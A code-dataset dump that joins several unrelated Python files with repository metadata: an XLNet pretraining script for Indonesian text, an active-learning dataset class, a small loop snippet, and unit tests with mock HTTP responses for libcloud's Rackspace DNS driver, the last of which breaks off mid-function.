] | 2 | 2020-02-25T04:53:02.000Z | 2020-06-21T11:33:18.000Z | pretraining/xlnet_premodel.py | drr3d/id-pytorch-transformers | 504bdd3c47eb6a2206ef9be3118cd0367bf3526d | [
"Apache-2.0"
] | null | null | null | pretraining/xlnet_premodel.py | drr3d/id-pytorch-transformers | 504bdd3c47eb6a2206ef9be3118cd0367bf3526d | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
This example intended as instruction for training new XLNet model from scratch,
aimed mainly for Indonesian language.
But i thinks naturaly this model can be use to train another language as well.
"""
import sys
sys.path.append("..")
import os
import time
import torch
import torch.nn as nn
import numpy as np
import random
import math
from text_utils import TextDataset, loadAndCacheExamples
from model_utils import restoreModel
from tokenizer.tokenization_id import TokenizerId
from modeling.xlnet_modeling import XLNetModel, XLNetConfig
from torch.utils.data import DataLoader, RandomSampler
from torch.nn import CrossEntropyLoss
from tqdm import tqdm
from transformers import WarmupLinearSchedule, AdamW
################################################################################################################
################ TRAINING ######################
################################################################################################################
def set_seed(seed, n_gpu=1):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if n_gpu > 0:
torch.cuda.manual_seed_all(seed)
def doTraining(model, config, dataset, tokenizer, optimizer, scheduler, tr_loss,
logging_loss, gradient_accumulation_steps, mlm_probability, device,
local_rank, train_batch_size, num_epoch, max_grad_norm, n_gpu,
logging_steps, start_iters=0, mlm=False, save_dir='./pretrained/',
train_model_name='gpt2', fp16=False):
if fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
# Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3'], defaul 01
print("Trained using apex fp16..")
model, optimizer = amp.initialize(model, optimizer, opt_level='O2')
if n_gpu > 1:
model = torch.nn.DataParallel(model)
train_sampler = RandomSampler(dataset)
train_dataloader = DataLoader(dataset, sampler=train_sampler, batch_size=train_batch_size)
lm_loss = nn.Linear(config.d_model, config.n_token, bias=True).to(device)
model.train()
for cur_epoch in range(start_iters, num_epoch):
start = time.time()
epoch_iterator = tqdm(train_dataloader, desc="Iteration-{}".format(cur_epoch), disable=local_rank not in [-1, 0])
loss = 0.
for step, batch in enumerate(epoch_iterator):
# The model is set in evaluation mode by default using ``model.eval()`` (Dropout modules are deactivated)
# To train the model, you should first set it back in training mode with ``model.train()``
inputs, labels = (batch.type(torch.LongTensor), batch.type(torch.LongTensor))
inputs = inputs.to(device)
labels = labels.to(device)
outputs = model(inputs)
logits = lm_loss(outputs[0])
loss_fct = CrossEntropyLoss(ignore_index=-1)
loss = loss_fct(logits.view(-1, logits.size(-1)),
labels.view(-1))
if n_gpu > 1:
loss = loss.mean()
if gradient_accumulation_steps > 1:
loss = loss / gradient_accumulation_steps
if fp16:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
tr_loss += loss.item()
if (step + 1) % gradient_accumulation_steps == 0:
if fp16:
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), max_grad_norm)
else:
torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)
# Update parameters and take a step using the computed gradient
optimizer.step()
# Update learning rate schedule
scheduler.step()
# Clear out the gradients (by default they accumulate)
model.zero_grad()
end = time.time()
op = "Epoch: {}, completed in: {}, loss: {}, perplexity: {}\n".format(cur_epoch, (end - start), (tr_loss - logging_loss)/logging_steps,
math.exp(loss))
print(op)
with open("saved_trainingprogress.txt", 'a') as fw:
fw.write(op)
logging_loss = tr_loss
# Save checkpoint
_path = os.path.join(save_dir, 'epoch_{}-{}_id.ckpt'.format(cur_epoch, train_model_name))
torch.save(model.state_dict(), _path)
def main(corpus_dir, corpus_name, model_dir, trained_model_savedir, create_tokenizer=False, train_model_name='gpt2',
train_spm=True, save_tokenized=False, dotraining=False, model_name=None, resume=False, vocab_name='vocab',
resume_iters=0, spm_vocab_size=2000, spm_max_sentence_length=4098, spm_model_name='spm_id', block_size=512,
spm_model_type='unigram', train_batch_size=1, num_epoch=1000):
###################################################################################
# set torch device
if torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device("cpu")
n_gpu = torch.cuda.device_count()
set_seed(seed=1332, n_gpu=n_gpu)
num_epoch = num_epoch
max_grad_norm = 1.0
gradient_accumulation_steps = 50
warmup_steps = 200
tr_loss, logging_loss = 0.0, 0.0
logging_steps = 50
max_steps = -1
mlm_probability = 0.15
local_rank = -1
train_batch_size = train_batch_size
block_size = block_size
## loading tokenizer
tokenizer = TokenizerId(spm_vocab_size=spm_vocab_size)
## prepare dataset
_dataset = corpus_dir + corpus_name
if create_tokenizer:
data_list=['<unk>','<sep>', '<cls>']
with open(_dataset, encoding="utf-8") as fp:
line = fp.readline()
while line:
line = fp.readline()
data_list.append(line)
tokenizer.createVocab(data_list, spm_text_file=_dataset, data_dir=model_dir, train_spm=train_spm,
spm_max_sentence_length=spm_max_sentence_length, spm_model_name=spm_model_name,
spm_model_type=spm_model_type)
else:
tokenizer.from_pretrained(model_dir, use_spm=train_spm, spm_model_name=spm_model_name, spm_max_sentence_length=spm_max_sentence_length,
std_vocab_name=vocab_name)
print("tokenizer.vocab_size: {}".format(tokenizer.vocab_size))
## saving tokenized object for consistent use
if save_tokenized:
tokenizer.save_pretrained(model_dir, vocab_name=vocab_name)
## create cache of training dataset
train_dataset = loadAndCacheExamples(_dataset, block_size, tokenizer, evaluate=False, use_spm=train_spm)
if dotraining:
dataset = train_dataset
print("Loading train_dataset done...")
if max_steps > 0:
t_total = max_steps
else:
t_total = len(dataset) // gradient_accumulation_steps * num_epoch
print("t_total: {}".format(t_total))
config = XLNetConfig(vocab_size_or_config_json_file=tokenizer.vocab_size)
model = XLNetModel(config)
# prepare output_attentions and hidden_states
model.output_hidden_states=True
## resume iters:
if resume:
model = restoreModel(model, resume_iters=resume_iters, model_name=model_name, model_save_dir=model_dir+trained_model_savedir)
model.to(device)
num_params = 0
for p in model.parameters():
num_params += p.numel()
print(model)
print("The number of model_parameters: {}".format(num_params))
weight_decay = 0.1
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=0.00025, eps=1e-8)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=warmup_steps, t_total=t_total)
doTraining(model, config, train_dataset, tokenizer, optimizer, scheduler, tr_loss, logging_loss,
gradient_accumulation_steps, mlm_probability, device, local_rank, train_batch_size,
num_epoch=num_epoch, start_iters=resume_iters, max_grad_norm=max_grad_norm, n_gpu=n_gpu,
logging_steps=logging_steps, save_dir=model_dir+trained_model_savedir, train_model_name=train_model_name)
if __name__ == '__main__':
## Training new data
## Step-1
## set save_tokenized=True and create_tokenizer=True if you not yet do the training for tokenizers
main(corpus_dir='../../temporary_before_move_to_git/id-pytorch-transformers/samples/wiki_datasets/id/', corpus_name='combined_AE.txt', train_model_name='xlnet_id_wikicombindeAE',
model_dir='../../temporary_before_move_to_git/id-pytorch-transformers/samples/wiki_datasets/trained_model/', spm_vocab_size=20000, vocab_name='vocab_wikicombindeAE_id',
trained_model_savedir="xlnet/", spm_max_sentence_length=75000, spm_model_name='spm_wikicombindeAE_id',
dotraining=True, resume=False, train_spm=True, save_tokenized=False, create_tokenizer=False, block_size=768,
spm_model_type='unigram', train_batch_size=1, num_epoch=1000) | 43.493506 | 182 | 0.618294 |
4a2119b327d1c72230fb9d52be99d9678974f444 | 11,151 | py | Python | dataset.py | MiriamHu/ActiveBoundary | 197c0d1d0d68644e74c1fdf2534339b74990ae94 | [
"MIT"
] | 11 | 2017-10-20T14:18:17.000Z | 2021-03-16T08:52:48.000Z | dataset.py | MiriamHu/ActiveBoundary | 197c0d1d0d68644e74c1fdf2534339b74990ae94 | [
"MIT"
] | 1 | 2018-04-30T12:39:33.000Z | 2018-05-01T10:45:33.000Z | dataset.py | MiriamHu/ActiveBoundary | 197c0d1d0d68644e74c1fdf2534339b74990ae94 | [
"MIT"
] | 3 | 2017-12-02T00:14:41.000Z | 2018-04-16T15:13:25.000Z | # Taken inspiration from https://github.com/ntucllab/libact/blob/master/libact/base/dataset.py
import traceback
import numpy as np
from fuel.datasets import H5PYDataset
from sklearn import preprocessing
import os
import h5py
from utils import to_vector
__author__ = 'mhuijser'
class Dataset(object):
def __init__(self, X, y, groundtruth_y, X_val, y_val, unlabeled_class=-5, al_batch_size=1, save_path_db_points=None,
dataset=None):
"""
Dataset object that takes care of all the dataset operations and makes sure that the data is centered and has
unit variance.
:param X: numpy array with shape (n_samples, n_features)
:param y: numpy array with shape (n_samples, 1). The currently known labels.
Unlabeled samples have by default class=-5.
:param groundtruth_y: groundtruth labels. Numpy array with shape (n_samples, 1).
:param X_val: not used.
:param y_val: not used.
:param unlabeled_class: the int denoting an absent label.
:param al_batch_size: active learning batch size; the number of queries per active learning iteration.
:param save_path_db_points: Save path (dir) where the decision boundary annotations should be saved to.
:param dataset:
"""
if X.dtype not in [np.float, np.float32, np.float64] or y.dtype not in [np.float, np.float32,
np.float64] or groundtruth_y.dtype not in [
np.float, np.float32, np.float64]:
raise ValueError("Should be float")
self.unlabeled_class = unlabeled_class
self.data = {"features": X, "targets": y}
self.groundtruth_y = groundtruth_y
self.__db_points_scaled = None
if save_path_db_points is not None:
self.save_path_dbpoints_hdf5 = os.path.join(save_path_db_points,
os.path.normpath(save_path_db_points) + "_dbpoints.hdf5")
else:
self.save_path_dbpoints_hdf5 = None
self._scaling_transformation = None
self.center_and_to_unit_variance()
self._update_callback = []
self.__batch_sample = 0
self.al_batch_size = al_batch_size
self.on_update(self.check_if_batch_finished_and_center)
self.__validation_data = None
self.dataset = dataset
if X_val is not None and y_val is not None:
self.__validation_data = {"features": X_val, "targets": y_val}
def __len__(self):
return self.data["features"].shape[0]
@property
def __dimensionality__(self):
return self.data["features"].shape[1]
@property
def classes_dictionary(self):
"""
The integer labels as provided in the dataset hdf5s with the human-readable string labels.
:return:
"""
if "handbags" in self.dataset:
return {1: "handbag", 2: "shoe"}
if "svhn" in self.dataset:
return {10: "0", 8: "8"}
if "mnist" in self.dataset:
return {0: "0", 8: "8"}
else:
raise Exception("Classes dictionary not specified for current dataset!")
@property
def classes(self):
# Sorted from low to high
return np.unique(self.groundtruth_y)
def len_labeled(self):
return self.get_labeled_train_data(scaled=False)["features"].shape[0]
def len_unlabeled(self):
return self.get_unlabeled_train_data(scaled=False)["features"].shape[0]
@property
def scaling_transformation(self):
return self._scaling_transformation
@scaling_transformation.setter
def scaling_transformation(self, new_scaling_transformation):
self._scaling_transformation = new_scaling_transformation
    def get_db_points(self, scaled=True):
        # Guard against the no-annotations case in both branches; the original
        # only checked it for the scaled branch.
        if self.__db_points_scaled is None:
            return None
        if scaled:
            return self.__db_points_scaled.copy()
        return self.scaling_transformation.inverse_transform(self.__db_points_scaled)
def get_validation_data(self, scaled=True):
if scaled:
try:
return {"features": self.scaling_transformation.transform(self.__validation_data["features"]),
"targets": self.__validation_data["targets"]}
except TypeError:
return None
else:
return self.__validation_data
def get_labeled_train_data(self, scaled=True):
"""
Returns dictionary with the labeled samples, their labels and their entry ids
(index into whole data set self.data)
"features" are n_samples x n_features
"""
entry_ids, _, = np.where(self.data["targets"] != self.unlabeled_class)
if len(entry_ids) == 0:
return {"features": np.array([]), "targets": np.array([])}
if scaled:
return {"features": self.scaling_transformation.transform(self.data["features"][entry_ids][:]),
"targets": self.data["targets"][entry_ids],
"entry_ids": entry_ids}
else:
return {"features": self.data["features"][entry_ids][:],
"targets": self.data["targets"][entry_ids],
"entry_ids": entry_ids}
def get_unlabeled_train_data(self, scaled=True):
"""
Returns dictionary with the unlabeled samples and their entry ids (index into whole data set self.data)
"""
entry_ids, _, = np.where(self.data["targets"] == self.unlabeled_class)
if scaled:
return {"entry_ids": entry_ids,
"features": self.scaling_transformation.transform(self.data["features"][entry_ids][:])}
else:
return {"entry_ids": entry_ids,
"features": self.data["features"][entry_ids][:]}
def center_and_to_unit_variance(self, *args):
"""
Center the data set and the decision boundary points using the labeled train set.
:return:
"""
print "Scaling data to zero mean and unit variance..."
self.scaling_transformation = preprocessing.StandardScaler(copy=True).fit(self.data["features"])
print "Updated scaling transformation"
def check_if_batch_finished_and_center(self, *args):
self.__batch_sample += 1
if self.__batch_sample % self.al_batch_size == 0:
print "Labeling batch finished"
def add_db_point(self, db_point):
"""
Add a decision boundary annotation to the dataset.
:param db_point: decision boundary point(s) to add of shape (n_samples, n_features) in scaled space!
:return:
"""
if db_point.shape[1] != self.__dimensionality__:
raise Exception(
"Dimension mismatch. Shape[1] should be %d, not %d" % (self.__dimensionality__, db_point.shape[1]))
        # db_point arrives in scaled space, the same space as the scaled
        # features and the previously stored decision boundary points.
if self.__db_points_scaled is not None:
self.__db_points_scaled = np.vstack((self.__db_points_scaled, db_point))
else:
self.__db_points_scaled = db_point
print "Added new decision boundary annotation point"
if self.save_path_dbpoints_hdf5 is not None:
print "Saving decision boundary annotation point to", self.save_path_dbpoints_hdf5
self.save_db_point_to_hdf5(db_point)
def save_db_point_to_hdf5(self, db_point_scaled_space):
"""
Save a decision boundary annotation to hdf5.
:param db_point_scaled_space: (n_samples, n_features)
:return:
"""
try:
db_point_original_space = self.scaling_transformation.inverse_transform(
db_point_scaled_space) # shape (1,nlat)
if os.path.isfile(self.save_path_dbpoints_hdf5):
with h5py.File(self.save_path_dbpoints_hdf5, 'r+') as hf:
dbpoints_dataset = hf.get('db_points')
already_in_dataset = dbpoints_dataset.shape[0]
dbpoints_dataset.resize(already_in_dataset + db_point_original_space.shape[0], axis=0)
dbpoints_dataset[already_in_dataset:already_in_dataset + db_point_original_space.shape[0],
:] = db_point_original_space
split_dict = {"data": {"db_points": (0, already_in_dataset + db_point_original_space.shape[0])}}
hf.attrs["split"] = H5PYDataset.create_split_array(split_dict)
else:
# HDF5 query line save file does not exist yet!
f = h5py.File(self.save_path_dbpoints_hdf5, "w")
dbpoints_dataset = f.create_dataset('db_points', db_point_original_space.shape,
maxshape=(None, db_point_original_space.shape[1]), dtype="float32")
dbpoints_dataset[...] = db_point_original_space
split_dict = {"data": {"db_points": (0, db_point_original_space.shape[0])}}
f.attrs['split'] = H5PYDataset.create_split_array(split_dict)
f.flush()
f.close()
except Exception:
traceback.print_exc()
def update(self, entry_id, new_label, sample=None):
"""
Updates an entry with entry_id with the given label.
:param entry_id: entry id of the sample to update.
:param label: Label of the sample to be update.
"""
if isinstance(new_label, int):
new_label = np.array(new_label).reshape(1, 1)
if entry_id is None and sample is not None:
self.data["features"] = np.concatenate((self.data["features"], to_vector(sample).T), axis=0)
self.data["targets"] = np.concatenate((self.data["targets"], new_label), axis=0)
else:
self.data["targets"][entry_id] = new_label
for callback in self._update_callback:
callback(entry_id, new_label)
def on_update(self, callback):
self._update_callback.append(callback)
def format_sklearn(self):
"""
Returns dataset in (X, y) format for use in scikit-learn.
Unlabeled entries are ignored.
Returns
-------
X : numpy array, shape = (n_samples, n_features)
Sample feature set.
y : numpy array, shape = (n_samples)
Sample labels.
"""
labeled_train = self.get_labeled_train_data()
X, y = labeled_train["features"], labeled_train["targets"]
return X, y[:, 0]
def format_keras(self):
scaled_data = self.get_labeled_train_data()
return scaled_data["features"], scaled_data["targets"]
def validation_data_format_keras(self):
scaled_val = self.get_validation_data()
if scaled_val is None:
return None, None
else:
return scaled_val["features"], scaled_val["targets"]
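
# A minimal usage sketch (shapes and values are illustrative; -5 marks
# unlabeled samples, matching the default unlabeled_class):
#
#     import numpy as np
#     X = np.random.randn(100, 8)
#     y_true = np.where(X[:, :1] > 0, 1.0, 2.0)   # (100, 1) groundtruth labels
#     y = np.full_like(y_true, -5.0)              # start fully unlabeled
#     y[:5] = y_true[:5]                          # seed a few known labels
#     ds = Dataset(X, y, y_true, X_val=None, y_val=None)
#     first_unlabeled = ds.get_unlabeled_train_data()["entry_ids"][0]
#     ds.update(first_unlabeled, 1)               # annotate one sample
#     X_lab, y_lab = ds.format_sklearn()          # labeled data for sklearn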
| 43.729412 | 123 | 0.621648 |
4a211a23af47845b7045f627d8ec576dd4c6cb2a | 118 | py | Python | snippets/for-loop-sample.py | coshkun/6.00.1x-MITx-Course-Training-Lab-Notes | 63e755dc81fd50a7b1372074a4a73e50021a233b | [
"MIT"
] | null | null | null | snippets/for-loop-sample.py | coshkun/6.00.1x-MITx-Course-Training-Lab-Notes | 63e755dc81fd50a7b1372074a4a73e50021a233b | [
"MIT"
] | null | null | null | snippets/for-loop-sample.py | coshkun/6.00.1x-MITx-Course-Training-Lab-Notes | 63e755dc81fd50a7b1372074a4a73e50021a233b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 11 19:39:13 2017
@author: coskun
"""
for n in range(5):
print(n)
| 11.8 | 35 | 0.567797 |
4a211a3f85880e582ba86d983d8a960f411ad10a | 20,348 | py | Python | libcloud/test/dns/test_rackspace.py | vanclevstik/libcloud | 2d58fa9ed4defec7f44ce0b83aede701dbc806e1 | [
"Apache-2.0"
] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | libcloud/test/dns/test_rackspace.py | elastacloud/libcloud | f3792b2dca835c548bdbce0da2eb71bfc9463b72 | [
"Apache-2.0"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | libcloud/test/dns/test_rackspace.py | elastacloud/libcloud | f3792b2dca835c548bdbce0da2eb71bfc9463b72 | [
"Apache-2.0"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
from libcloud.utils.py3 import httplib
from libcloud.common.types import LibcloudError
from libcloud.dns.types import RecordType, ZoneDoesNotExistError
from libcloud.dns.types import RecordDoesNotExistError
from libcloud.dns.drivers.rackspace import RackspaceUSDNSDriver
from libcloud.dns.drivers.rackspace import RackspaceUKDNSDriver
from libcloud.test import MockHttp
from libcloud.test.file_fixtures import DNSFileFixtures
from libcloud.test.secrets import DNS_PARAMS_RACKSPACE
class RackspaceUSTests(unittest.TestCase):
klass = RackspaceUSDNSDriver
endpoint_url = 'https://dns.api.rackspacecloud.com/v1.0/11111'
def setUp(self):
self.klass.connectionCls.conn_classes = (
None, RackspaceMockHttp)
RackspaceMockHttp.type = None
self.driver = self.klass(*DNS_PARAMS_RACKSPACE)
self.driver.connection.poll_interval = 0.0
# normally authentication happens lazily, but we force it here
self.driver.connection._populate_hosts_and_request_paths()
def test_force_auth_token_kwargs(self):
kwargs = {
'ex_force_auth_token': 'some-auth-token',
'ex_force_base_url': 'https://dns.api.rackspacecloud.com/v1.0/11111'
}
driver = self.klass(*DNS_PARAMS_RACKSPACE, **kwargs)
driver.list_zones()
self.assertEqual(kwargs['ex_force_auth_token'],
driver.connection.auth_token)
self.assertEqual('/v1.0/11111',
driver.connection.request_path)
def test_force_auth_url_kwargs(self):
kwargs = {
'ex_force_auth_version': '2.0',
'ex_force_auth_url': 'https://identity.api.rackspace.com'
}
driver = self.klass(*DNS_PARAMS_RACKSPACE, **kwargs)
self.assertEqual(kwargs['ex_force_auth_url'],
driver.connection._ex_force_auth_url)
self.assertEqual(kwargs['ex_force_auth_version'],
driver.connection._auth_version)
def test_gets_auth_2_0_endpoint(self):
kwargs = {'ex_force_auth_version': '2.0_password'}
driver = self.klass(*DNS_PARAMS_RACKSPACE, **kwargs)
driver.connection._populate_hosts_and_request_paths()
self.assertEquals(self.endpoint_url, driver.connection.get_endpoint())
def test_list_record_types(self):
record_types = self.driver.list_record_types()
self.assertEqual(len(record_types), 8)
self.assertTrue(RecordType.A in record_types)
def test_list_zones_success(self):
zones = self.driver.list_zones()
self.assertEqual(len(zones), 6)
self.assertEqual(zones[0].domain, 'foo4.bar.com')
self.assertEqual(zones[0].extra['comment'], 'wazaaa')
def test_list_zones_http_413(self):
RackspaceMockHttp.type = '413'
try:
self.driver.list_zones()
except LibcloudError:
pass
else:
self.fail('Exception was not thrown')
def test_list_zones_no_results(self):
RackspaceMockHttp.type = 'NO_RESULTS'
zones = self.driver.list_zones()
self.assertEqual(len(zones), 0)
def test_list_records_success(self):
zone = self.driver.list_zones()[0]
records = self.driver.list_records(zone=zone)
self.assertEqual(len(records), 3)
self.assertEqual(records[0].name, 'test3')
self.assertEqual(records[0].type, RecordType.A)
self.assertEqual(records[0].data, '127.7.7.7')
self.assertEqual(records[0].extra['ttl'], 777)
self.assertEqual(records[0].extra['comment'], 'lulz')
self.assertEqual(records[0].extra['fqdn'], 'test3.%s' %
(records[0].zone.domain))
def test_list_records_no_results(self):
zone = self.driver.list_zones()[0]
RackspaceMockHttp.type = 'NO_RESULTS'
records = self.driver.list_records(zone=zone)
self.assertEqual(len(records), 0)
def test_list_records_zone_does_not_exist(self):
zone = self.driver.list_zones()[0]
RackspaceMockHttp.type = 'ZONE_DOES_NOT_EXIST'
try:
self.driver.list_records(zone=zone)
except ZoneDoesNotExistError:
e = sys.exc_info()[1]
self.assertEqual(e.zone_id, zone.id)
else:
self.fail('Exception was not thrown')
def test_get_zone_success(self):
RackspaceMockHttp.type = 'GET_ZONE'
zone = self.driver.get_zone(zone_id='2946063')
self.assertEqual(zone.id, '2946063')
self.assertEqual(zone.domain, 'foo4.bar.com')
self.assertEqual(zone.type, 'master')
self.assertEqual(zone.extra['email'], '[email protected]')
def test_get_zone_does_not_exist(self):
RackspaceMockHttp.type = 'DOES_NOT_EXIST'
try:
self.driver.get_zone(zone_id='4444')
except ZoneDoesNotExistError:
e = sys.exc_info()[1]
self.assertEqual(e.zone_id, '4444')
else:
self.fail('Exception was not thrown')
def test_get_record_success(self):
record = self.driver.get_record(zone_id='12345678',
record_id='23456789')
self.assertEqual(record.id, 'A-7423034')
self.assertEqual(record.name, 'test3')
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.extra['comment'], 'lulz')
def test_get_record_zone_does_not_exist(self):
RackspaceMockHttp.type = 'ZONE_DOES_NOT_EXIST'
try:
self.driver.get_record(zone_id='444', record_id='28536')
except ZoneDoesNotExistError:
pass
else:
self.fail('Exception was not thrown')
def test_get_record_record_does_not_exist(self):
RackspaceMockHttp.type = 'RECORD_DOES_NOT_EXIST'
try:
self.driver.get_record(zone_id='12345678',
record_id='28536')
except RecordDoesNotExistError:
pass
else:
self.fail('Exception was not thrown')
def test_create_zone_success(self):
RackspaceMockHttp.type = 'CREATE_ZONE'
zone = self.driver.create_zone(domain='bar.foo1.com', type='master',
ttl=None,
extra={'email': '[email protected]'})
self.assertEqual(zone.id, '2946173')
self.assertEqual(zone.domain, 'bar.foo1.com')
self.assertEqual(zone.type, 'master')
self.assertEqual(zone.extra['email'], '[email protected]')
def test_create_zone_validaton_error(self):
RackspaceMockHttp.type = 'CREATE_ZONE_VALIDATION_ERROR'
try:
self.driver.create_zone(domain='foo.bar.com', type='master',
ttl=10,
extra={'email': '[email protected]'})
except Exception:
e = sys.exc_info()[1]
self.assertEqual(str(e), 'Validation errors: Domain TTL is ' +
'required and must be greater than ' +
'or equal to 300')
else:
self.fail('Exception was not thrown')
def test_update_zone_success(self):
zone = self.driver.list_zones()[0]
updated_zone = self.driver.update_zone(zone=zone,
extra={'comment':
'bar foo'})
self.assertEqual(zone.extra['comment'], 'wazaaa')
self.assertEqual(updated_zone.id, zone.id)
self.assertEqual(updated_zone.domain, 'foo4.bar.com')
self.assertEqual(updated_zone.type, zone.type)
self.assertEqual(updated_zone.ttl, zone.ttl)
self.assertEqual(updated_zone.extra['comment'], 'bar foo')
def test_update_zone_domain_cannot_be_changed(self):
zone = self.driver.list_zones()[0]
try:
self.driver.update_zone(zone=zone, domain='libcloud.org')
except LibcloudError:
pass
else:
self.fail('Exception was not thrown')
def test_create_record_success(self):
zone = self.driver.list_zones()[0]
RackspaceMockHttp.type = 'CREATE_RECORD'
record = self.driver.create_record(name='www', zone=zone,
type=RecordType.A, data='127.1.1.1')
self.assertEqual(record.id, 'A-7423317')
self.assertEqual(record.name, 'www')
self.assertEqual(record.zone, zone)
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, '127.1.1.1')
self.assertEqual(record.extra['fqdn'], 'www.%s' % (zone.domain))
def test_update_record_success(self):
zone = self.driver.list_zones()[0]
record = self.driver.list_records(zone=zone)[0]
updated_record = self.driver.update_record(record=record,
data='127.3.3.3')
self.assertEqual(record.name, 'test3')
self.assertEqual(record.data, '127.7.7.7')
self.assertEqual(updated_record.id, record.id)
self.assertEqual(updated_record.name, record.name)
self.assertEqual(updated_record.zone, record.zone)
self.assertEqual(updated_record.type, record.type)
self.assertEqual(updated_record.data, '127.3.3.3')
def test_delete_zone_success(self):
zone = self.driver.list_zones()[0]
status = self.driver.delete_zone(zone=zone)
self.assertTrue(status)
def test_delete_zone_does_not_exist(self):
zone = self.driver.list_zones()[0]
RackspaceMockHttp.type = 'ZONE_DOES_NOT_EXIST'
try:
self.driver.delete_zone(zone=zone)
except ZoneDoesNotExistError:
e = sys.exc_info()[1]
self.assertEqual(e.zone_id, zone.id)
else:
self.fail('Exception was not thrown')
def test_delete_record_success(self):
zone = self.driver.list_zones()[0]
record = self.driver.list_records(zone=zone)[0]
status = self.driver.delete_record(record=record)
self.assertTrue(status)
def test_delete_record_does_not_exist(self):
zone = self.driver.list_zones()[0]
record = self.driver.list_records(zone=zone)[0]
RackspaceMockHttp.type = 'RECORD_DOES_NOT_EXIST'
try:
self.driver.delete_record(record=record)
except RecordDoesNotExistError:
e = sys.exc_info()[1]
self.assertEqual(e.record_id, record.id)
else:
self.fail('Exception was not thrown')
def test_to_full_record_name_name_provided(self):
domain = 'foo.bar'
name = 'test'
self.assertEqual(self.driver._to_full_record_name(domain, name),
'test.foo.bar')
def test_to_full_record_name_name_not_provided(self):
domain = 'foo.bar'
name = None
self.assertEqual(self.driver._to_full_record_name(domain, name),
'foo.bar')
def test_to_partial_record_name(self):
domain = 'example.com'
names = ['test.example.com', 'foo.bar.example.com',
'example.com.example.com', 'example.com']
expected_values = ['test', 'foo.bar', 'example.com', None]
for name, expected_value in zip(names, expected_values):
value = self.driver._to_partial_record_name(domain=domain,
name=name)
self.assertEqual(value, expected_value)
class RackspaceUKTests(RackspaceUSTests):
klass = RackspaceUKDNSDriver
endpoint_url = 'https://lon.dns.api.rackspacecloud.com/v1.0/11111'
class RackspaceMockHttp(MockHttp):
fixtures = DNSFileFixtures('rackspace')
base_headers = {'content-type': 'application/json'}
def _v2_0_tokens(self, method, url, body, headers):
body = self.fixtures.load('auth_2_0.json')
headers = {
'content-type': 'application/json'
}
return (httplib.OK, body, headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains(self, method, url, body, headers):
body = self.fixtures.load('list_zones_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_413(self, method, url, body, headers):
body = ''
return (httplib.REQUEST_ENTITY_TOO_LARGE, body, self.base_headers,
httplib.responses[httplib.REQUEST_ENTITY_TOO_LARGE])
def _v1_0_11111_domains_NO_RESULTS(self, method, url, body, headers):
body = self.fixtures.load('list_zones_no_results.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('list_records_success.json')
elif method == 'PUT':
# Async - update_zone
body = self.fixtures.load('update_zone_success.json')
elif method == 'DELETE':
            # Async - delete_zone
body = self.fixtures.load('delete_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_NO_RESULTS(self, method, url, body,
headers):
body = self.fixtures.load('list_records_no_results.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_ZONE_DOES_NOT_EXIST(self, method, url,
body, headers):
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _v1_0_11111_domains_2946063_GET_ZONE(self, method, url, body, headers):
body = self.fixtures.load('get_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_4444_DOES_NOT_EXIST(self, method, url, body,
headers):
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _v1_0_11111_domains_12345678(self, method, url, body, headers):
body = self.fixtures.load('get_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_12345678_records_23456789(self, method, url, body,
headers):
body = self.fixtures.load('get_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_444_ZONE_DOES_NOT_EXIST(self, method, url, body,
headers):
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _v1_0_11111_domains_12345678_RECORD_DOES_NOT_EXIST(self, method, url,
body, headers):
body = self.fixtures.load('get_zone_success.json')
return (httplib.OK, body, self.base_headers,
